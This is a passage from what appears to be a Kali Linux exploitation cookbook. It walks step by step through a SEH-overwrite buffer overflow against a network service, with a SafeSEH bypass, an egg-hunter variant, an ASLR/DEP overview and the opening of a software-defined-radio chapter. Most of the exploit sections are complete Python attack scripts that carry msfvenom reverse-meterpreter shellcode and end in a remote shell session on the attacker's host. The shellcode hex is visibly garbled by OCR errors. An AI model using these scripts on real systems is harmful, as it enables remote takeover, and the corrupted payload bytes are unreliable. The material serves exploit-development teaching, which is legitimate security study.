8. In the File menu in the debugger, we go to View | SEH chain. Here, we will see that the address has
been overwritten by AAAA. Now we press Shift+F9 to pass the exception to the program. We will see
that the EIP has been overwritten, and we get an error:

[Screenshot: the "SEH chain of thread" window with the handler address overwritten]


We will also notice that the other register values have now become zero. This zeroing of registers 
was introduced in Windows XP SP1 and later in order to make SEH exploitation more difficult. 


We are using Windows XP SP2. It has a feature called SafeSEH. When this option is enabled in the
module, only the memory addresses listed in the module's registered SEH handler table can be used, which
means if we use any address that is not on the list from a module compiled with /SAFESEH ON, the SEH
address will not be used by the Windows exception handler and the SEH overwrite will fail.

There are a few ways to bypass this, and this is one of them: using an overwrite address from a
module that was not compiled with the /SAFESEH ON or IMAGE_DLLCHARACTERISTICS_NO_SEH options.

To find that, we will use a plugin called mona for Immunity Debugger. It can be downloaded from https://github.com/corelan/mona:




13. We simply copy the Python file into the PyCommands folder of the Immunity application.


14. Let's move on to making the exploit. We have seen that the EIP has already been overwritten. Now
we will try to find the exact bytes at which the crash occurs using the pattern_create script in Kali
Linux:


ruby /path/to/script/pattern_create.rb -l 2500


The following screenshot shows the output of the preceding command: 


# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2...
[2,500-byte cyclic pattern, truncated here]





15. The code should be something like this: 


#!/usr/bin/python
import socket

target_address = "192.168.110.12"
target_port = 6660

buffer = "USV "
# paste the full 2,500-byte output of pattern_create.rb here (truncated in the book)
buffer += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print "Sent!!"
sock.close()


16. We now run this file, and in Immunity Debugger, we will see the access violation error. We now go 
to View | SEH chain. 

17. We will see that our SEH has been overwritten with bytes. We copy the 42326742 value and find its 
location using the pattern_offset script in Kali: 





[Screenshot: the SEH chain window (Address | SE handler) with the handler overwritten by 42326742]


ruby /path/to/script/pattern_offset.rb -q 42326742


The following screenshot shows the output of the preceding command:


:/media/sf_Downloads/BOOK# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 42326742
[*] Exact match at offset 966


18. We will see that the offset is 966 bytes at which the handler is overwritten. 
19. Now let's modify our exploit a bit and see what happens. We have 966 bytes; we will use 962 bytes of
As, 4 bytes of breakpoints (\xcc), 4 Bs, and the rest of the bytes as Cs to see what happens:


#!/usr/bin/python
import socket

target_address = "192.168.110.12"
target_port = 6660

buffer = "USV "
buffer += "A" * 962                       # padding up to the SEH record
buffer += "\xcc\xcc\xcc\xcc"              # 4 breakpoint bytes
buffer += "BBBB"                          # 4 bytes that land in the SE handler
buffer += "C" * (2504 - len(buffer))      # the rest of the 2,504-byte request
buffer += "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()


20. We run this and view the SEH chain. Here, we will notice an interesting thing: the first 4 breakpoints 
we added have actually overwritten a memory address, and the next 4 have been overwritten into our 
SEH handler: 


[Screenshot: the SEH chain window (Address | SE handler) after the crash]


This happens as the SEH is a pointer that points to the memory address where the code is stored 
when an exception occurs. 


21. Let's pass the exception to the program and we will see that EIP has been overwritten, but when we
look in the memory, we will see that our Cs have been written approximately 6 bytes after our Bs in
the memory. We can use a pop ret followed by a short jump to jump to our shellcode.


22. We type the !safeseh command in the debugger's console:


!safeseh


This will show us the list of all DLLs that are not compiled using /SAFESEH ON. In the log window, we
will see the list:


[Screenshot: the Immunity Debugger Log data window listing the modules reported by !safeseh]





Let's use the DLL vbajet32.dll. Our goal is to find a pop pop ret sequence in the DLL that we can use to
bypass SEH.


We find our DLL on the Windows machine and copy it to Kali. Kali has another great tool known as
msfpescan, that can be used to find the pop pop ret sequence in the DLL:


/path/to/msfpescan -f vbajet32.d1l -s 


The following screenshot shows the output of the preceding command: 


root@kali:/media/sf_Downloads/BOOK# /usr/share/framework2/msfpescan -f vbajet32.dll -s
[Screenshot: addresses of the pop ebx / pop ecx / ret, pop ebx / ret and ret sequences found in vbajet32.dll]


26. Here, we have the addresses of all the pop pop ret sequences in the DLL. We will use the first one,
0x0f9a196a. We also need a short jump, which will cause a jump to our shellcode, that is, the Cs stored in
memory.

A short jump is \xeb\x06, where 06 is the number of bytes we need to jump. That leaves us 2 bytes short of
the 4-byte address slot, so we pad it with 2 NOPs.


Let's create a shellcode; since we are sending this over HTTP, we need to make sure we avoid bad
characters. We will use msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -f py -b "\x00\xff\x20\x25\x0a\x0d" -v buffer


The following screenshot shows the output of the preceding command: 


root@kali:/media/sf_Downloads/BOOK# msfvenom -p windows/meterpreter/reverse_tcp -f py -b "\x00\xff\x0a\x0d\x20\x25" -v buffer
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Final size of py file: 1843 bytes
buffer = ""
[the buffer += "\x.." lines of the encoded payload follow; they are unreadable in the screenshot]


29. We will put everything in the exploit, as follows: 





#!/usr/bin/python
import socket

target_address = "192.168.110.12"
target_port = 6660

buffer = "USV "
buffer += "\x41" * 962            # offset: padding up to the SEH record
# nSEH: 6-byte SHORT jump over the handler address into the NOPs before the shellcode
buffer += "\xeb\x06\x90\x90"
# SEH: POP+POP+RET 0x0f9a196a from vbajet32.dll (little-endian)
buffer += "\x6a\x19\x9a\x0f"
buffer += "\x90" * 16             # NOPs leading into the shellcode
# Shellcode: reverse meterpreter (the msfvenom output from the previous step)

buffer += "\xdb\xde\xd9\x74\x24\xf4\xbFf\xcf\x9F\xb1\x9a\x5e" 
buffer += "\x31\xc9\xb1\x54\x83\xee\xfo\x31\x7e\x14\x03\x7e" 
buffer += "\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72" 
buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4F" 
buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce" 
buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60" 
buffer += "\xca\x74\x79\x95\x7Ff\xcO\x42\x1e\x33\xc4\xc2\xc3" 
buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4F" 
buffer += "\x92\xf7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11" 
buffer += "\x76\x9F\x64\x55\xbO\x40\x13\xaf\xc3\xfd\x24\x74" 
buffer += "\xbe\xd9\xa1\x6f\x18\xa9\x12\x54\x99\x7e\xc4\x1F" 
buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4" 
buffer += "\x4c\x13\x4d\xfO\x15\xc7\xec\xa1\xf3\xa6\x11\xb1i" 
buffer += "\x5c\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\xib" 
buffer += "\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xfO\xf2\xfoO" 
buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo0" 
buffer += "\x37\xbO\x6f\x21\xb8\x65\xO05\x24\x2e\x46\x72\x48" 
buffer += "\xa5\x2e\x81\x95\xa8\xf2\xOc\x73\x9a\x5a\x5F\x2c" 
buffer += "\x5a\xOb\x1f\x9c\x32\x41\x9O\xc3\x22\x6a\x7a\x6c" 
buffer += "\xc8\x85\xd3\xc4\x64\x3Ff\x7e\x9e\x15\xcO\x54\xda" 
buffer += "\xi15\x4a\x5d\xita\xdb\xbb\x14\x08\xOb\xda\xd6\xd0" 
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfe" 
buffer += "\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee" 
buffer += "\x06\x65\xf2\xee\x50\xef\xf2\x86\x04\x4b\xal\xb3" 
buffer += "\x4b\x46\xd5\x6Ff\xd9\x69\x8c\xdc\x4a\x02\x32\x3a" 
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F" 
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a" 
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFd\x06\x46\xd9\xa3\x07" 
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19" 
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8" 
# NOP SLED to fill the rest of the request
buffer += "\x90" * (2504 - len(buffer))
buffer += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print "Sent!!"
sock.close()




30. Let's run this without the debugger this time. We will open our handler in Kali, and we should have
meterpreter access:

[*] Started reverse TCP handler on 192.168.110.7:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.110.12
[*] Meterpreter session 3 opened (192.168.110.7:4444 -> 192.168.110.12:1380) at 2017-07-14 08:54:54 -0400

meterpreter >





See also

• https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
• http://resources.infosecinstitute.com/bypassing-seh-protection-a-real-life-example/


Exploiting egg hunters

Egg hunting is used when there is not enough contiguous space in memory to place our shellcode.
Using this technique, we prefix our shellcode with a unique tag (the egg); the egg hunter, a much smaller
piece of code, then searches memory for that tag and executes the shellcode that follows it.

The egg hunter is itself a set of instructions, not much different from shellcode. There are multiple egg
hunters available. You can learn more about them and how they work from this paper by skape:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf.


Getting ready 


We will try to make an exploit with an egg hunter for the same software we used in the previous recipe.
The logic behind the exploitation would be something similar to what is shown in the following diagram:

[Diagram: Junk Bytes | nSEH | SEH | EGGHUNTER | SHELLCODE]

Our aim is to overwrite the nSEH and then the SEH in order to make it jump to the egg hunter shellcode,
which, when executed, will find and execute our shellcode in memory.


How to do it... 


Following are the steps that demonstrate the use of the egg hunter:

1. We start the software on Windows XP and attach it to the debugger (Select process to attach).
2. We already know the crash bytes and the address to bypass SafeSEH.
3. Now we need to add our egg hunter and then use it to jump to our shellcode.
4. As we know, the egg hunter is a shellcode, and the basic rule for using a shellcode is to make sure it
does not have any bad characters.
5. Let's look at the previous exploit we made:


#!/usr/bin/python
import socket

target_address = "192.168.110.12"
target_port = 6660

buffer = "USV "
buffer += "\x41" * 962 #offset
# 6 Bytes SHORT jump to shellcode
buffer += "\xeb\x06\x90\x90"
# POP+POP+RET 0x0f9a196a
buffer += "\x6a\x19\x9a\x0f"
buffer += "\x90" * 16
#Shellcode Reverse meterpreter.
buffer += "\xdb\xde\xd9\x74\x24\xf4\xbf\xcf\x9F\xb1\x9a\x5e"
buffer += "\x31\xc9\xb1\x54\x83\xee\xFo\x31\x7e\x14\x03\x7e"
buffer += "\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72"
buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4Ff"
buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce"
buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60"
buffer += "\xca\x74\x79\x95\x7 F\xcO\x42\x1e\x33\xc4\xc2\xc3"
buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4Ff"
buffer += "\x92\xXF7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11"
buffer += "\x76\xX9F\xX64\x55\xbO\x40\x13\xaf\xc3\xFd\x24\x74"
buffer += "\xbe\xd9\xa1l\x6fF\x18\xa9\x12\x54\x99\x7e\xc4\x1F"
buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4"
buffer += "\x4c\x13\x4d\xfO\x15\xc7\xec\xal\xf3\xa6\x11\xbi"
buffer += "\x5C\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\x1b"
buffer += "\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xFO\xF2\x FO"
buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo"
buffer += "\x37\xbO\x6F\xX21\xb8\x65\x05\x24\x2e\x46\x72\x48"
buffer += "\xa5\x2e\x81\x95\xa8B\xf2\xOC\x73\x9a\x5a\x5F\x2ce"
buffer += "\x5a\xOb\x1F\x9c\x32\x41\x90\xc3\x22\x6a\x7a\x6c"
buffer += "\xc8\x85\xd3\xc4\x64\x3F\x7e\x9e\x15\xcO\x54\xda"
buffer += "\x15\x4a\x5d\x1a\xdb\xbb\x14\x08\x0b\xda\xd6\xdo"
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfc"
buffer += "\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee"
buffer += "\xO6\x65\xf2\xee\x50\xef\xF2\x86\x04\x4b\xai\xb3"
buffer += "\x4b\x46\xd5\x6f\xd9\x69\x8c\xdc\x4a\x02\x32\x3a"
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F"
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a"
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFfd\x06\x46\xd9\xa3\x07"
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19"
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8"
# NOP SLED
buffer += "\x90" * (2504 - len(buffer))
buffer += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print "Sent!!"
sock.close()


6. Let's consider that the shellcode isn't actually located right after the 6-byte jump we made. In
this situation, we can use an egg hunter to make a reliable exploit for the software.
7. Now it may sound easy, but there are some complications. We need our final exploit to follow the
flow shown in the diagram, and we also need to make sure we have enough NOPs in the buffer for the
exploit to work reliably.
8. In our case, we had enough memory to hold the shellcode, so the previous flow was sufficient. In
other cases, we may not have that much memory, or our shellcode may be stored somewhere else in
memory. In those cases, we go for egg hunting, with the following flow:

[Diagram: Junk Bytes | nSEH | SEH | Nop | Egghunter | Nop | Tag | Shellcode]

9. Following the preceding flow diagram, our exploit would look something like this:


#!/usr/bin/python
import socket

target_address = "192.168.110.12"
target_port = 6660

# Egghunter shellcode, 32 bytes: searches memory for the tag "w00t" twice in a row
egghunter = ""
egghunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# nSEH: SHORT jump over the handler address into the NOPs before the egghunter
nseh = "\xeb\x09\x90\x90"
# SEH: POP+POP+RET 0x0f9a196a
seh = "\x6a\x19\x9a\x0f"

# Shellcode: reverse meterpreter, 360 bytes
buffer = ""
buffer += "\xdb\xde\xd9\x74\x24\xf4\xbFf\xcf\x9F\xb1i\x9a\x5e"
buffer += "\x31\xc9\xb1\x54\x83\xee\xfo\x31\x7e\x14\x03\x7e"
buffer += "\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72"
buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4F"
buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce"
buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60"
buffer += "\xca\x74\x79\x95\x7Ff\xcO\x42\x1e\x33\xc4\xc2\xc3"
buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4F"
buffer += "\x92\xf7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11"
buffer += "\x76\x9F\x64\x55\xbO\x40\x13\xaf\ xc3\xfd\x24\x74"
buffer += "\xbe\xd9\xa1\x6f\x18\xa9\x12\x54\x99\x7e\xc4\x1F"
buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4"
buffer += "\x4c\x13\x4d\xfO\x15\xc7\xec\xa1\xf3\xa6\x11\xb1i"
buffer += "\x5c\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\x1b"
buffer += "\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xfO\xf2\xfoO"
buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo"
buffer += "\x37\xbO\x6f\x21\xb8\x65\xO05\x24\x2e\x46\x72\x48"
buffer += "\xa5\x2e\x81\x95\xa8\xf2\xOc\x73\x9a\x5a\x5F\x2c"
buffer += "\x5a\xOb\x1f\x9c\x32\x41\x9O\xc3\x22\x6a\x7a\x6c"
buffer += "\xc8\x85\xd3\xc4\x64\x3Ff\x7e\x9e\x15\xcO\x54\xda"
buffer += "\xi5\x4a\x5d\xita\xdb\xbb\x14\x08\x0b\xda\xd6\xd0"
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfe"
buffer += "\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee"
buffer += "\xO06\x65\xf2\xee\x50\xef\xf2\x86\x04\x4b\xal\xb3"
buffer += "\x4b\x46\xd5\x6Ff\xd9\x69\x8c\xdc\x4a\x02\x32\x3a"
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F"
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a"
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFd\x06\x46\xd9\xa3\x07"
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19"
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8"

nop = "\x90" * 301
tag = "w00tw00t"

buffer1 = "USV "
buffer1 += nop * 2 + "\x90" * 360          # padding up to the SEH record (offset 966)
buffer1 += nseh + seh                      # 8 bytes
buffer1 += "\x90" * 6                      # NOPs the short jump lands in
buffer1 += egghunter
buffer1 += nop
buffer1 += tag                             # the egg, immediately followed by the shellcode
buffer1 += buffer
buffer1 += "\x90" * (3504 - len(buffer1))  # pad the whole request
buffer1 += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer1)
print "Sent!!"
sock.close()


10. We go ahead and save it as script.py and run it using python script.py.
11. We should then have our meterpreter session waiting for us.

The exploit code we wrote may not work in the exact same way on every system, because there are
multiple dependencies, such as the OS version, the software version, and so on.
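As an added example (not code from the book), the following Python 3 script checks the buffer layouts of the SEH recipe and of this egg-hunter recipe using the sizes and addresses given above: where the short jump placed in nSEH lands, whether the tag the egg hunter searches for is the egg placed in front of the shellcode, and whether the pieces that are sent unencoded contain any of the bad characters passed to msfvenom. The meterpreter shellcode is replaced by a constructed NOP placeholder, and nothing is sent over the network.

```python
# Added example, not code from the book: sanity checks for the SEH and
# egg-hunter buffer layouts described in the recipes above (Python 3).

BAD_CHARS = b"\x00\xff\x20\x25\x0a\x0d"      # the -b list from the msfvenom step

# The 32-byte egg hunter listed in the recipe; it looks for "w00t" twice in a row.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
NSEH = b"\xeb\x09\x90\x90"    # jmp short +9, padded to the 4-byte nSEH slot
SEH = b"\x6a\x19\x9a\x0f"     # 0x0f9a196a (pop pop ret in vbajet32.dll), little-endian
TAG = b"w00tw00t"             # the egg: the 4-byte tag repeated twice
CRASH_OFFSET = 966            # bytes before the SEH record, from pattern_offset.rb


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return [(offset, byte)] for every bad character found in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def hunter_tag(hunter):
    """The 4-byte tag an egg hunter compares against: the imm32 of its single
    'mov eax, imm32' instruction (opcode 0xb8)."""
    i = hunter.index(b"\xb8")
    return hunter[i + 1:i + 5]


def short_jmp_target(jmp_offset, code):
    """Offset reached by a 2-byte 'jmp short rel8' (EB xx) sitting at jmp_offset."""
    if code[0] != 0xEB:
        raise ValueError("not a short jump")
    rel8 = code[1] - 0x100 if code[1] >= 0x80 else code[1]
    return jmp_offset + 2 + rel8


def build_egghunter_layout(shellcode, total_len=3504):
    """Assemble the recipe's egg-hunter request; return (buffer, offsets)."""
    parts = [
        ("junk", b"USV " + b"\x90" * (CRASH_OFFSET - 4)),  # recipe: "USV " + 2*301 + 360 NOPs
        ("nseh", NSEH),
        ("seh", SEH),
        ("nops_before_hunter", b"\x90" * 6),
        ("egghunter", EGGHUNTER),
        ("nops_before_tag", b"\x90" * 301),
        ("tag", TAG),
        ("shellcode", shellcode),
    ]
    buf, offsets = b"", {}
    for name, data in parts:
        offsets[name] = len(buf)
        buf += data
    if len(buf) > total_len:
        raise ValueError("layout is longer than total_len")
    buf += b"\x90" * (total_len - len(buf)) + b"\r\n\r\n"
    return buf, offsets


def check_layout(buf, offsets):
    """The checks worth running before trusting the layout in a debugger."""
    jmp_target = short_jmp_target(offsets["nseh"], buf[offsets["nseh"]:])
    return {
        # the jump in nSEH must land in the NOPs that slide into the hunter
        "jmp_target": jmp_target,
        "jmp_lands_before_hunter":
            offsets["nops_before_hunter"] <= jmp_target <= offsets["egghunter"],
        # the hunter's tag must be the one placed in front of the shellcode
        "tag_matches": hunter_tag(EGGHUNTER) * 2 == buf[offsets["tag"]:offsets["tag"] + 8],
        # the hunter jumps to the byte right after the 8-byte egg
        "shellcode_follows_tag": offsets["tag"] + 8 == offsets["shellcode"],
        # bytes that are sent without encoding: the SEH record and the hunter itself
        "bad_in_seh_record":
            find_bad_chars(buf[offsets["nseh"]:offsets["nops_before_hunter"]]),
        "bad_in_egghunter": find_bad_chars(EGGHUNTER),
    }
```

Note that the scan flags the two 0xff bytes inside the egg hunter: 0xff is on the recipe's bad-character list, but only the msfvenom payload was encoded, so whether the hunter arrives intact is something to confirm in the debugger rather than assume.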


See also

• https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
• http://www.fuzzysecurity.com/tutorials/expDev/4.html


An overview of ASLR and NX bypass 


Address Space Layout Randomization (ASLR) was introduced in 2001 by the PaX project as a Linux
patch and was integrated into Windows Vista and later versions. It is a memory protection that protects against
buffer overflows by randomizing the locations at which executables are loaded in memory. Data
Execution Prevention (DEP), or no-execute (NX), was also introduced with Internet Explorer 7 on
Windows Vista, and it helps prevent buffer overflow exploitation by blocking code execution from memory
that is marked as non-executable.


How to do it... 


We need to evade ASLR first. There are basically two ways in which ASLR can be bypassed:

1. We look for any modules loaded in memory without ASLR (anti-ASLR modules). The base address of
such a module is at a fixed location, so from there we can use the Return Oriented Programming (ROP)
approach: we use small pieces of existing code, each followed by a return instruction, and chain
them together to get the desired result:

[Diagram] Source: https://www.slideshare.net/dataera/remix-ondemand-live-randomization-finegrained-live-aslr-during-runtime

2. We get a pointer leak/memory leak, and we adjust the offset to grab the base address of the
module whose pointer gets leaked.

Next, we need to bypass NX/DEP. To do this, we use the well-known ret-to-libc attack (in Linux)
or ROP chaining (in Windows). This method allows us to use libc functions to perform the task we
would have done with our shellcode.

There's another method for bypassing ASLR on 32-bit systems: a 32-bit address space is comparatively
small compared to 64-bit systems, which makes the range of randomization smaller and feasible to
brute force.

This is pretty much the basic concept behind bypassing ASLR and DEP. There are many more
advanced ways of writing exploits, and as patches are applied, new methods to bypass them are
discovered every day.
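As an added example that is not from the book, the following Python 3 script reads the DllCharacteristics field of a PE image to tell whether a module was built with ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT) support; a module without them is the kind of anti-ASLR module the first bypass relies on, and the same check is what a defender runs over a product's DLLs before shipping. The sample images are constructed in memory (headers only), with placeholder module names, not real DLLs.

```python
import struct

# Added example, not from the book: report the ASLR/NX related flags of a PE
# image. Offsets follow the PE/COFF specification; the images are constructed.

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",   # 64-bit ASLR with high entropy
    0x0040: "DYNAMIC_BASE",      # image may be relocated at load time (ASLR)
    0x0100: "NX_COMPAT",         # image is compatible with DEP/NX
    0x0400: "NO_SEH",            # image contains no SEH handlers
    0x4000: "GUARD_CF",          # Control Flow Guard
}
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe_mitigations(data):
    """Return the mitigation-related flags of the PE image held in `data`."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                      # skip the signature and COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both formats
    chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "dll_characteristics": chars,
        "flags": [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if chars & bit],
        "aslr": bool(chars & 0x0040),
        "nx": bool(chars & 0x0100),
    }


def modules_without_mitigations(images):
    """Given {module name: image bytes}, list the modules that lack ASLR, NX or both,
    which is what a debugger's module listing flags as fixed-address targets."""
    report = {}
    for name, data in images.items():
        info = parse_pe_mitigations(data)
        missing = [m for m, ok in (("ASLR", info["aslr"]), ("NX", info["nx"])) if not ok]
        if missing:
            report[name] = missing
    return report


def build_sample_pe(dll_characteristics, pe32plus=False):
    """Construct a minimal header-only PE32 or PE32+ image for testing."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224          # optional header incl. 16 data directories
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,   # Machine
                       1, 0, 0, 0, opt_size, 0x2102)    # sections, stamp, symtab, nsyms, size, flags
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos + b"PE\0\0" + coff + bytes(opt)
```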


See also 


• https://www.trustwave.com/Resources/SpiderLabs-Blog/Baby-s-first-NX-ASLR-bypass/
• http://taishi8117.github.io/2015/11/11/stack-bof-2/
• https://www.exploit-db.com/docs/17914.pdf
• http://tekwizz123.blogspot.com/2014/02/bypassing-aslr-and-dep-on-windows-7.html
• https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/


Playing with Software-Defined Radios 


In this chapter, we will cover the following recipes:

• Introduction to radio frequency scanners
• Hands-on with RTLSDR scanner
• Playing around with gqrx
• Kalibrating device for GSM tapping
• Decoding ADS-B messages with Dump1090


Introduction 


The term software-defined radio means implementing hardware-based radio components, such as
modulators, demodulators and tuners, in software. In this chapter we will cover different recipes and
look at multiple ways in which RTLSDR can be used to play around with frequencies and the data being
transported over them.


Radio frequency scanners 


RTLSDR is a very cheap (around 20 USD) software-defined radio that uses a DVB-T TV tuner dongle. In 
this recipe, we will cover connecting an RTLSDR device with Kali Linux to test whether it was detected 
successfully. 


Getting ready 


We will need some hardware for this recipe. It's easily available for purchase from Amazon or from
https://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/. Kali already has tools for us to get going with it.


How to do it... 


We connect our device and it should be detected in Kali Linux. It's common for the devices to behave 
inaccurately. Here is the recipe to run the test: 


1. We will first run the test using the command:

rtl_test

The following screenshot shows the output of the preceding command:

root@kali:~# rtl_test
Found 1 device(s):
  0:  Realtek, RTL2838UHIDIR, SN: 00000001

Using device 0: Generic RTL2832U OEM
Found Rafael Micro R820T tuner
Supported gain values (29): 0.0 0.9 1.4 2.7 3.7 7.7 8.7 12.5 14.4 15.7 16.6 19.7
20.7 22.9 25.4 28.0 29.7 32.8 33.8 36.4 37.2 38.6 40.2 42.1 43.4 43.9 44.5 48.0
49.6
[R82XX] PLL not locked!
Sampling at 2048000 S/s.

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.

Reading samples in async mode...
lost at least 16 bytes
lost at least 60 bytes
lost at least 60 bytes
lost at least 60 bytes
lost at least 128 bytes
lost at least 196 bytes




2. We may see some packet drops. This is because we are trying this in a VM setup with only USB 2.0.
3. In case there are a lot of packet drops, we can test with a lower sampling rate using rtl_test -s
1000000:

root@kali:~# rtl_test -s 1000000
Found 1 device(s):
  0:  Realtek, RTL2838UHIDIR, SN: 00000001

